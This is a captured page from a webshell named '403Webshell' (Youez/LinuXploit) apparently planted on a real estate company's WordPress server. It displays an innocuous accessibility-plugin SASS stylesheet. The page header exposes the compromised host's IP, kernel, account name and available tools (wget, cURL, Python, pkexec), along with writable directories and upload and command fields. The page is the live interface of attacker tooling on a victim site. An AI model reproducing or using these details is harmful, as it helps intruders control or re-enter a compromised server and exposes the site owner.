403Webshell
Server IP : 170.10.161.225  /  Your IP : 216.73.217.54
Web Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : ON
Directory :  /home/www/calvetrealty.com/wp-content/plugins/readabler/sass/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/www/calvetrealty.com/wp-content/plugins/readabler/sass//_readabler-controls.sass
@import "includes/vars"

/** Readable Controls. */
.mdp-readabler-action-box

  &.mdp-disabled
    opacity: .5
    filter: grayscale(100%)

/** Range Box control */
.mdp-readabler-input-spinner-box
  margin-top: $controlSize/8

  .mdp-readabler-control
    position: relative
    width: 90%
    min-width: 180px
    max-width: 260px
    margin: auto
    border-radius: $controlSize
    height: $controlSize

    .mdp-readabler-plus,
    .mdp-readabler-minus
      position: absolute
      display: block
      padding: 0
      right: 0
      top: 50%
      transform: translateY(-50%)
      border-radius: 50%
      background-color: unset !important
      cursor: pointer
      z-index: 2
      transition: all .15s ease
      user-select: none
      border: none

      &:before
        content: ''
        display: block
        width: 29px
        height: 29px
        mask-position: center
        mask-repeat: no-repeat
        mask-size: contain
        border-radius: 50%

      &:focus
        outline: none

    .mdp-readabler-plus
      right: -1px
      left: auto

      &:before
        mask-image: url("../images/toggles/plus.svg")

    .mdp-readabler-minus
      left: -1px
      right: auto

      &:before
        mask-image: url("../images/toggles/minus.svg")

    .mdp-readabler-value
      text-align: center
      font-size: $fontSize
      font-weight: 600
      padding: 0 $controlSize
      line-height: $controlSize
      overflow: hidden
      white-space: nowrap

/** Toggle Box control */
.mdp-readabler-toggle-box
  cursor: pointer
  user-select: none
  width: calc( 50% - 12px )

  .mdp-readabler-icon
    mask-position: center
    mask-repeat: no-repeat
    mask-size: contain

  &.mdp-active
    color: #fff

    span
      color: white !important

    span.mdp-readabler-icon
      background-color: white

/** Spinner box */
.mdp-readabler-spinner-box

  &:not(.mdp-readabler-shortcode)
    width: 100%

  i
    display: none

/** Palette control. */
.mdp-readabler-palette-box
  padding: $padding/2

  .mdp-readabler-action-box-content
    flex-direction: column

  .mdp-readabler-color-box
    user-select: none
    width: 100%
    display: flex
    flex-direction: row
    flex-wrap: wrap
    justify-content: flex-start
    margin-top: $padding/4

    .mdp-readabler-color
      display: flex
      width: $controlSize
      height: $controlSize
      border-radius: 50%
      cursor: pointer
      position: relative
      margin: $controlSize/7.5
      transition: .15s
      box-sizing: border-box

      &:hover
        border: none

      &:focus
        outline: none
        border: none

      &.mdp-active
        border: none

        &::before
          content: ''
          display: block
          width: $controlSize/2
          height: $controlSize/2
          border-radius: 50%
          top: 50%
          left: 50%
          transform: translate(50%, 50%)

        &:hover

          &::before
            width: $controlSize/2
            height: $controlSize/2

Youez - 2016 - github.com/yon3zu
LinuXploit